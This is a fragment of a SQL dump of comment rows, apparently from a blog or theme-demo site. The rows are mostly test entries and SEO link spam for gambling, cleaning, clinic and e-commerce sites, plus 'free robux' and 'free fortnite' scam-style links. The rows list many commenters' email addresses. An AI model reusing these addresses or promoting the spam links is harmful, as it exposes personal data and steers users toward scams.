(541, 0, 12, 0, 0, 'ayurani2019', 'ayurani2019@gmail.com', 'http://xtrabola.net/cara-mudah-bermain-dan-menang-slot-games-live22/', 'I LIKE THIS JOURNAL BLOG\r\n&lt;a href=&quot;https://bandar303.casa/produk/live22-slot/&quot; rel=&quot;nofollow&quot;&gt;LIVE22&lt;/a&gt;\r\n&lt;a href=&quot;http://xtrabola.net/cara-mudah-bermain-dan-menang-slot-games-live22/&quot; rel=&quot;nofollow&quot;&gt;Cara Mudah Bermain dan Menang Slot Games Live22&lt;/a&gt;', 1, '2020-05-19 02:52:41'),
(542, 0, 12, 0, 0, 'N11 Opencart Entegrasyonu', 'infooc@ggg.co', 'https://www.ticaretpanelim.com', 'N11 Opencart Entegrasyonu', 1, '2020-05-19 23:29:34'),
(543, 0, 12, 0, 0, 'Opencart Api Entegrasyonu', 'aaa@aaax1.co', 'https://www.google.com.tr/url?sa=i&amp;url=https://blog.ticaretpanelim.com/opencart', 'https://www.google.com.tr/url?sa=i&amp;url=https://blog.ticaretpanelim.com/n11', 1, '2020-05-26 09:01:12'),
(544, 0, 12, 0, 0, 'Hesabım', 'ewr@gmail.com', 'https://ticaretpaketim.com', 'https://ticaretpaketim.com', 1, '2020-05-26 16:25:06'),
(545, 0, 12, 0, 0, 'Pazarlama', 'sd@gmail.com', 'https://ticaretpaketim.com', 'https://ticaretpaketim.com', 1, '2020-05-26 16:25:14'),
(546, 0, 12, 0, 0, 'BlogLAR', '333@gmail.com', 'https://ticaretpaketim.com', 'https://ticaretpaketim.com', 1, '2020-05-26 16:25:21'),
(547, 0, 12, 0, 0, 'Kategori', '34@gmail.com', 'https://ticaretpaketim.com', 'https://ticaretpaketim.com', 1, '2020-05-26 16:25:33'),
(548, 0, 12, 0, 0, 'Kategorilerimiz', 'rer@gmail.com', 'https://ticaretpaketim.com', 'https://ticaretpaketim.com', 1, '2020-05-26 16:25:45'),
(549, 0, 12, 0, 0, 'test', 'test@test.co', 'test', 'test', 1, '2020-05-26 16:25:57'),
(550, 0, 12, 0, 0, 'test', 'test@dfdf.co', 'test', 'test', 1, '2020-05-26 16:26:05'),
(551, 0, 12, 0, 0, 'test', 'test@gmail.com', 'test', 'test', 1, '2020-05-26 16:26:18'),
(552, 0, 12, 0, 0, 'test', 'test@gmail.com', 'test', 'test', 1, '2020-05-26 16:26:30'),
(553, 0, 12, 0, 0, 'KODODA ® Creative Solutions', 'unsal_deniz@yahoo.com', 'https://www.kododa.com.tr', 'E-Ticaret Özel ve Açık Kaynaklı yazılımlar, masaüstü ve mobil yazılım desteği ile hizmetinizdeyiz.\r\n\r\nKODODA ® Creative Solutions', 1, '2020-06-14 21:24:03'),
(554, 0, 12, 0, 0, 'Gaziantep Web Tasarım', 'info@ajansfalcon.com', 'https://www.google.com.tr/url?sa=i&amp;url=https://ajansfalcon.com/', 'Temalarınız çok güzel, müşterilerimize kullanabiliriz.', 1, '2020-06-17 23:56:29'),
(555, 1, 1, 0, 0, 'kgkgéeg', 'kkkrkrkr@gmail.com', 'www.gkdkssslo.com', 'kgkergkrégkrgklgkré  g eg efg eg eg e ge g eg eg e', 1, '2020-06-26 13:56:08'),
(556, 0, 10, 0, 0, 'dsfd', 'test@gmail.com', 'asdf', 'sdfrveif dwcs', 1, '2020-07-09 09:36:05'),
(557, 556, 10, 0, 0, 'sdf', 'dsf@asd.com', 'sdf', 'sdfdfgbeg wecwc', 1, '2020-07-09 09:36:29'),
(558, 0, 12, 0, 0, 'HP 973x', 'aasaf@hgfff.co', 'https://kartuscenter.com', 'Thnk you', 1, '2020-07-19 11:20:45'),
(559, 524, 12, 0, 0, 'Samantha Hutchinson', 'zufiv@mailinator.com', 'https://www.qotiviki.co', 'Voluptate voluptate', 1, '2020-07-26 16:25:29'),
(560, 0, 12, 0, 0, 'Montana Wilder', 'zaduviwopi@mailinator.com', 'https://www.qekomygepaqufox.in', 'Dolore consequatur', 1, '2020-07-26 16:25:43'),
(561, 0, 12, 0, 0, 'Dr Thug', 'zitezesuhu@mailinator.com', 'https://www.zagifev.biz', 'Et dolorum ut unde e', 1, '2020-07-26 16:25:54'),
(562, 0, 12, 0, 0, 'REWR', 'TEST@EMAIL.COM', '', 'TEST', 1, '2020-07-30 20:53:48'),
(563, 0, 12, 0, 0, 'GrowJunkies', 'growjunkies@gmail.com', 'https://growjunkies.com', 'Testing to seeds if it works okay.', 1, '2020-08-13 04:23:34'),
(564, 500, 12, 0, 0, 'Trisna', 'trisna0204@gmail.com', 'teknologicentura.cok', 'Journal theme is the best', 1, '2020-08-17 11:45:15'),
(565, 0, 11, 0, 0, 'Century Papers', 'centuryoverseaspaper@gmail.com', 'https://www.centurypapers.com/leather-journals-manufacturer.php', 'Hello, this information is very amazing !\r\nThanks, for providing this useful information. If you want any query about transformer visit my site.', 1, '2020-08-26 08:28:52'),
(566, 0, 12, 0, 0, 'AAA', 'whatareyou@gmail.com', '', 'ABC asdfk asdf asdf', 1, '2020-10-14 16:11:53'),
(567, 0, 11, 0, 0, 'telefon askısı', 'zoeydesign1@gmail.com', 'https://zoey-design.com/', 'Telefon askısı ve kılıfı', 1, '2020-10-15 12:09:19'),
(568, 0, 12, 0, 0, 'Yakup Can', 'yakupcan@gmail.com', 'https://www.iletken.net', 'Referans', 1, '2020-10-21 18:06:22'),
(569, 0, 12, 0, 0, 'Yakup Can', 'yakupcan@gmail.com', 'www.iletken.net', 'Referans', 1, '2020-10-21 18:07:44'),
(570, 0, 12, 0, 0, 'Yakup Can', 'yakupcan@gmail.com', 'https://iletken.net', 'Referans', 1, '2020-10-21 18:08:30'),
(571, 0, 12, 0, 0, 'Vojtech', 'info@xxldvd.eu', 'https://www.xxldvd.eu', 'Nice webpage', 1, '2020-11-01 02:02:44'),
(572, 0, 12, 0, 0, 'cheap jordans', 'cheapjordans@gmail.com', 'http://www.nkspaces.com/', 'Testing to seeds if it works okay.', 1, '2020-11-04 08:37:01'),
(573, 0, 12, 0, 0, 'Alin Climn', 'info@biofarmservis.com', 'https://biofarmservis.com/', 'Great content', 1, '2020-11-10 19:54:31'),
(574, 0, 12, 0, 0, 'Alin Climn', 'info@biofarmservis.com', 'https://biofarmservis.com/', 'Great content', 1, '2020-11-10 19:56:06'),
(575, 0, 11, 0, 0, 'Alin Climn', 'info@biofarmservis.com', 'https://biofarmservis.com/', 'Great content', 1, '2020-11-10 20:03:45'),
(576, 0, 12, 0, 0, 'Salami', 'salami@gmail.com', '', 'some comments', 1, '2020-11-28 09:29:34'),
(577, 0, 11, 0, 2, 'Mochutkovskiy Anaklet', 'info@zdravmo.com', 'https://zdravmo.com/', 'Simple windows use rapid sigh connection points country large alteration not.', 1, '2020-12-12 17:17:09'),
(578, 0, 12, 0, 2, 'Mochutkovskiy Anaklet', 'info@zdravmo.com', 'https://zdravmo.com/', 'No considered laughing before cousin rank produce throwing propriety provision bachelor throwing missed dashwood of.', 1, '2020-12-12 17:28:22'),
(579, 0, 10, 0, 2, 'Mochutkovskiy Anaklet', 'info@zdravmo.com', 'https://zdravmo.com/', 'Books repair quick astonished certainty forming place lasting from fine ye determine side entirely wondered.', 1, '2020-12-12 17:30:16'),
(580, 0, 9, 0, 2, 'Mochutkovskiy Anaklet', 'info@zdravmo.com', 'https://zdravmo.com/ru-ru/', 'Talked savings by weeks properly pressed general position exertion six me staying supplied loud cheerful.', 1, '2020-12-12 17:31:13'),
(581, 0, 1, 0, 2, 'Mochutkovskiy Anaklet', 'info@zdravmo.com', 'https://zdravmo.com/ru-ru/', 'Told her denoting. Without painful remain bed. Extensive astonished handsome.', 1, '2020-12-12 17:31:59'),
(582, 0, 3, 0, 2, 'Mochutkovskiy Anaklet', 'info@zdravmo.com', 'https://zdravmo.com/moskva/', 'Decisively frankness thirty sight together estimable esteem sold additions bringing extent travelling friendship dejection.', 1, '2020-12-12 17:32:45'),
(583, 0, 4, 0, 2, 'Mochutkovskiy Anaklet', 'info@zdravmo.com', 'https://zdravmo.com/sankt-peterburg/', 'Talked savings by weeks properly pressed general position exertion six me staying supplied loud cheerful.', 1, '2020-12-12 17:33:29'),
(584, 0, 7, 0, 2, 'Mochutkovskiy Anaklet', 'info@zdravmo.com', 'https://zdravmo.com/', 'Decisively frankness thirty sight together estimable esteem sold additions bringing extent travelling friendship dejection.', 1, '2020-12-12 17:34:15'),
(585, 0, 8, 0, 2, 'Mochutkovskiy Anaklet', 'info@zdravmo.com', 'https://zdravmo.com/', 'Books repair quick astonished certainty forming place lasting from fine ye determine side entirely wondered.', 1, '2020-12-12 17:34:53'),
(586, 0, 4, 0, 2, 'atmelook', 'demo@atmelook.com', 'https://atmelook.com/', 'Prevent attention margaret expenses were. Income abilities shade result pleased terminated for suffer demesne four certainly estate. Mile therefore tell views hard attended winter denote themselves defective.', 1, '2020-12-12 19:08:15'),
(587, 0, 12, 0, 0, 'Valov', 'info@valov.ro', 'https://www.valov.ro', 'Amazing theme!', 1, '2020-12-16 22:45:11'),
(588, 0, 12, 0, 0, 'Poor Man Billionaire', 'pmb@geemail.cum', '', 'This is nicely done!', 1, '2020-12-27 09:03:24'),
(589, 0, 11, 0, 0, 'Test', 'Testggggsjaaijjs@gmail.com', '', 'Testing', 1, '2020-12-28 01:18:30'),
(590, 0, 11, 0, 0, 'Etik Hat', 'feartox@gmail.com', 'http://etikhat.com.tr', 'Güzel Site', 1, '2020-12-29 17:49:27'),
(591, 0, 12, 0, 0, 'Брутальный мужчина', 'mawiss@mail.ru', 'https://mawiss.ru/', 'https://mawiss.ru/\r\n\r\nNice webpage', 1, '2021-01-04 19:52:55'),
(592, 0, 1, 0, 0, 'Jitendra Kumar', 'jiten1973@outlook.com', 'https://askjitendrakumar.com/inbound-links/', 'The article is very good and find very good information. Thanks for sharing \r\n\r\nhttps://askjitendrakumar.com/inbound-links/', 1, '2021-01-27 13:46:13'),
(593, 0, 11, 0, 0, 'Bead The Purpose', 'kimbead77@gmail.com', 'https://beadthepurpose.com/', 'shop our wide selection of handmade inspirational customizable word bracelets at reasonable prices, and get free shipping on orders over $25.', 1, '2021-01-28 17:58:52'),
(594, 0, 10, 0, 0, 'Bead The Purpose', 'kimbead77@gmail.com', 'https://beadthepurpose.com/products/6-sale', 'We offer a 6$ sale on a large collection of handmade beaded bracelets. All bracelets are made with love and available in multiple colors.', 1, '2021-01-28 18:00:49'),
(595, 0, 9, 0, 0, 'free fortnite account', 'ovilewade9@gmail.com', 'https://bloggermanyu.com/free-fortnite-accounts', 'Most of the amazing article here this is like to read it online get free fortnite account it was the great fun for you and all friends so got it and start join it.', 1, '2021-05-16 16:34:35'),
(596, 0, 7, 0, 0, 'free fortnite skins generator', 'ryancoop987@gmail.com', 'https://freeskinsblog.com', 'Play the most  amazing game with you r friends and get the amazing prices.', 1, '2021-06-15 09:01:48'),
(597, 0, 10, 0, 0, 'ryancoop987', 'ryancoop987@gmail.com', '', 'Fantastic adventurist game play on our &lt;a href=&quot;https://freerobuxtips.com&quot;&gt;robux free&lt;/a&gt;  site so click this link and get the all games.', 1, '2021-06-15 09:04:48'),
(598, 0, 12, 0, 0, 'Drain Line Jetting Services in Dubai', 'mazmouae123@gmail.com', 'http://mazmouae.com/', 'Awesome Blog! Thank You for sharing with us\r\nMazmo provides the best cleaning and disinfection services in Dubai. Our services are drain line jetting, root cutting, ac duct cleaning, kitchen hood cleaning, etc. Visit our website and check our services. Book Now!', 1, '2021-06-22 10:23:56'),
(599, 0, 11, 0, 0, 'Sewage Tanker Services', 'mazmouae123@gmail.com', 'http://mazmouae.com/', 'This is so nicely done!\r\nMazmo is one of the leading professional cleaning and disinfection service providing company at the best rate and high quality. Our services are ac duct cleaning, kitchen hood cleaning, grease trap cleaning, root cutting, etc.', 1, '2021-06-22 10:25:07'),
(600, 0, 10, 0, 0, 'Cleaning and Disinfection Services in Dubai', 'mazmouae123@gmail.com', 'http://mazmouae.com/', 'Nice Blog!\r\nMazmo provides the best disinfection services in Dubai to support business across the globe to reduce the risk of infection and maintain high levels of hygiene.', 1, '2021-06-22 10:26:07'),
(601, 0, 9, 0, 0, 'Best Disinfection Services Dubai', 'mazmouae123@gmail.com', 'http://mazmouae.com/', 'Well Written\r\nMazmo UAE is one of the best cleaning service provider in Dubai that offer world-class cleaning services for our customers. Visit our website and check out our more services.', 1, '2021-06-22 10:28:42'),
(602, 0, 1, 0, 0, 'Best Disinfection Services in Dubai', 'mazmouae123@gmail.com', 'http://mazmouae.com/', 'Very Informative!\r\nMazmo UAE is a cleaning company in Dubai that will take care of a variety of cleaning services in your home or a commercial workspace. Book the service that needs you from the Mazmo UAE website!', 1, '2021-06-22 10:30:16'),
(603, 0, 3, 0, 0, 'Grease Trap Cleaning  in Dubai', 'mazmouae123@gmail.com', 'http://mazmouae.com/', 'Nice blog!\r\nMazmo Environmental Service provides the most reliable cleaning and disinfection services in Dubai at the best prices. Our team of professional cleaning services offer high-quality cleaning and disinfection services anywhere in the UAE.', 1, '2021-06-22 11:31:55'),
(604, 0, 12, 0, 0, 'Get to Know about Chiropractor Dubai Price | Al Biraa Clinic', 'albiraaclinic2021@gmail.com', 'https://www.albiraaclinic.com/dr-raslan-md-dc-chiropractor-chiropractor-in-dubai/', 'Chiropractor, Dr. Raslan is one of the only licenced doctors of a chiropractor in all of \r\nUAE. Dr. Raslan is very passionate about helping patients and others and provides unique, effective treatment for a variety of physical conditions. Other than neck, hand, legs, ankle etc, chiropractic doctors are spine or back pain treatment specialists who treat any spinal conditions or nerve, muscle or joint problems in the body.', 1, '2021-06-23 08:37:48'),
(605, 0, 11, 0, 0, 'Best Chiropractor in Abu Dhabi |  Al Biraa Clinic', 'albiraaclinic2021@gmail.com', 'https://www.albiraaclinic.com/dr-raslan-md-dc-chiropractor-chiropractor-in-dubai/', 'Chiropractor, Dr Raslan is one of the only licenced doctors of a chiropractor in all of UAE. Dr. Raslan is very passionate about helping patients and others and provides unique, effective treatment for a variety of physical conditions. Other than neck, hand, legs, ankle etc, chiropractic doctors are spine or back pain treatment specialists who treat any spinal conditions or nerve, muscle or joint problems in the body.', 1, '2021-06-23 08:38:39'),
(606, 0, 10, 0, 0, 'Best Back Pain Treatment in Dubai |  Al Biraa Clinic', 'albiraaclinic2021@gmail.com', 'https://www.albiraaclinic.com/dr-raslan-md-dc-chiropractor-chiropractor-in-dubai/', 'Chiropractor, Dr. Raslan is one of the only licenced doctors of a chiropractor in all of UAE. Dr. Raslan is very passionate about helping patients and others and provides unique, effective treatment for a variety of physical conditions. Other than neck, hand, legs, ankle etc, chiropractic doctors are spine or back pain treatment specialists who treat any spinal conditions or nerve, muscle or joint problems in the body.', 1, '2021-06-23 08:39:16'),
(607, 0, 9, 0, 0, 'Find Best Chiropractor in UAE |  Al Biraa Clinic', 'albiraaclinic2021@gmail.com', 'https://www.albiraaclinic.com/dr-raslan-md-dc-chiropractor-chiropractor-in-dubai/', 'Chiropractor, Dr. Raslan is one of the only licenced doctors of a chiropractor in all of UAE. Dr. Raslan is very passionate about helping patients and others and provides unique, effective treatment for a variety of physical conditions. Other than neck, hand, legs, ankle etc, chiropractic doctors are spine or back pain treatment specialists who treat any spinal conditions or nerve, muscle or joint problems in the body.', 1, '2021-06-23 08:40:57'),
(608, 0, 1, 0, 0, 'Best Chiropractor in UAE |  Al Biraa Clinic', 'albiraaclinic2021@gmail.com', 'https://www.albiraaclinic.com/dr-raslan-md-dc-chiropractor-chiropractor-in-dubai/', 'Chiropractor, Dr. Raslan is one of the only licenced doctors of a chiropractor in all of UAE. Dr. Raslan is very passionate about helping patients and others and provides unique, effective treatment for a variety of physical conditions. Other than neck, hand, legs, ankle etc, chiropractic doctors are spine or back pain treatment specialists who treat any spinal conditions or nerve, muscle or joint problems in the body.', 1, '2021-06-23 08:41:39'),
(609, 0, 3, 0, 0, 'Best Chiropractic Treatment in Dubai | Al Biraa Clinic', 'albiraaclinic2021@gmail.com', 'https://www.albiraaclinic.com/dr-raslan-md-dc-chiropractor-chiropractor-in-dubai/', 'Chiropractor, Dr. Raslan is one of the only licenced doctors of a chiropractor in all of UAE. Dr. Raslan is very passionate about helping patients and others and provides unique, effective treatment for a variety of physical conditions. Other than neck, hand, legs, ankle etc, chiropractic doctors are spine or back pain treatment specialists who treat any spinal conditions or nerve, muscle or joint problems in the body.', 1, '2021-06-23 08:43:33');

-- --------------------------------------------------------

--
